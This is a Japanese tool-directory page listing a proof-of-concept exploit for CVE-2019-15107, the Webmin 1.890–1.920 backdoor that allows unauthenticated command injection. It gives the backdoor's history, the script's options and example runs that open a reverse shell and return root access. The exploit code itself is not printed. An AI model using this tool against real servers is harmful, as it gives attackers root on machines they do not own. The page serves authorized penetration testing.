Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2019-15107 — CVE-2019-15107(Webmin <= 1.920)の概念実証エクスプロイト。コマンドインジェクションを介して認証なしのRCEを可能にします。 | Kitploit
ツール/GitHubGitHub/adampawelczyk/cve-2019-15107
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubadampawelczyk/cve-2019-15107

cve-2019-15107

CVE-2019-15107(Webmin <= 1.920)の概念実証エクスプロイト。コマンドインジェクションを介して認証なしのRCEを可能にします。

リポジトリを見る
15ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-15107 - Webmin 未認証RCE

説明

このリポジトリには、Webminバージョン1.890から1.920に影響を与えるCVE-2019-15107の概念実証(PoC)エクスプロイトが含まれています。

このスクリプトは、バージョン1.890から1.920におけるバックドアを悪用します。このバックドアにより、認証されていないユーザーがold(v.1.890ではexpired)パラメータを介してpassword_change.cgiエンドポイントにコマンドを注入できます。バックドアが仕込まれていたのはSourceForgeのダウンロードのみですが、これらはプロジェクトサイトで公式ダウンロードとしてリストされています。

未知の攻撃者(複数)が、ビルドサーバーのソースコードにPerlのqx文を2回挿入しました。1回目は2018年4月で、1.890リリースにバックドアが導入され、2回目は2018年7月で、リリース1.900から1.920にバックドアが再導入されました。

デフォルトインストールで悪用可能なのはバージョン1.890のみです。それ以降の影響を受けるバージョンでは、期限切れパスワード変更機能が有効になっている必要があります。

テスト環境

エクスプロイトは以下に対して正常にテストされました:

  • Webminバージョン: 1.890
  • オペレーティングシステム: Ubuntu 18.04.4 LTS

使用方法

root@kitploit:~
python3 cve-2019-15107.py -r <TARGET_IP> -l <LOCAL_IP> [options]

options:
  -h, --help                 このヘルプメッセージを表示して終了
  -r, --rhost RHOST          ターゲットIPアドレス
  -rp, --rport RPORT         ターゲットポート(デフォルト: 10000)
  -l, --lhost LHOST          リバースシェル用のローカルIP
  -lp, --lport LPORT         リバースシェル用のローカルポート(デフォルト: 4343)
  -s, --scheme {http,https}  使用するプロトコル(デフォルト: https)
  -x, --proxy [PROXY]        プロキシを使用(デフォルト: http://127.0.0.1:8080)
  -f, --force                検出が失敗しても強制的にエクスプロイトを実行
  -c, --cmd CMD              リバースシェルの代わりに単一コマンドを実行

使用例

root@kitploit:~
┌──(adam㉿kali)-[~]
└─$ python3 cve-2019-15107.py -r 10.114.159.93 -l 192.168.158.129

   _____   _____   ___ __  _ ___     _ ___ _  __ ____ 
  / __\ \ / / __|_|_  )  \/ / _ \___/ | __/ |/  \__  |
 | (__ \ V /| _|___/ / () | \_, /___| |__ \ | () |/ / 
  \___| \_/ |___| /___\__/|_|/_/    |_|___/_|\__//_/  

  CVE-2019-15107 | Webmin Unauthenticated RCE
  by adampawelczyk

[*] Checking vulnerability...
[*] Detecting target version...
[+] Detected Webmin 1.890
[+] Target is vulnerable
[*] Starting listener on port 4343...
listening on [any] 4343 ...
[*] Sending payload...
connect to [192.168.158.129] from (UNKNOWN) [10.114.159.93] 59970
bash: cannot set terminal process group (1314): Inappropriate ioctl for device
bash: no job control in this shell
root@source:/usr/share/webmin/# whoami
whoami
root
root@source:/usr/share/webmin/# 
root@kitploit:~
┌──(adam㉿kali)-[~]
└─$ python3 cve-2019-15107.py -r 10.114.159.93 -l 192.168.158.129 -c whoami                                                                                                                                                                 

   _____   _____   ___ __  _ ___     _ ___ _  __ ____ 
  / __\ \ / / __|_|_  )  \/ / _ \___/ | __/ |/  \__  |
 | (__ \ V /| _|___/ / () | \_, /___| |__ \ | () |/ / 
  \___| \_/ |___| /___\__/|_|/_/    |_|___/_|\__//_/  

  CVE-2019-15107 | Webmin Unauthenticated RCE
  by adampawelczyk

[*] Checking vulnerability...
[*] Detecting target version...
[+] Detected Webmin 1.890
[+] Target is vulnerable
[+] Command output:
========================================
root

参考文献

  • https://nvd.nist.gov/vuln/detail/CVE-2019-15107
  • https://webmin.com/security/
  • https://www.exploit-db.com/exploits/47230

免責事項

このツールは教育および許可されたテスト目的のみに使用されます。自分が所有していない、またはテストする許可がないシステムに対する不正使用は違法です。責任を持って使用してください。

ツールをダウンロード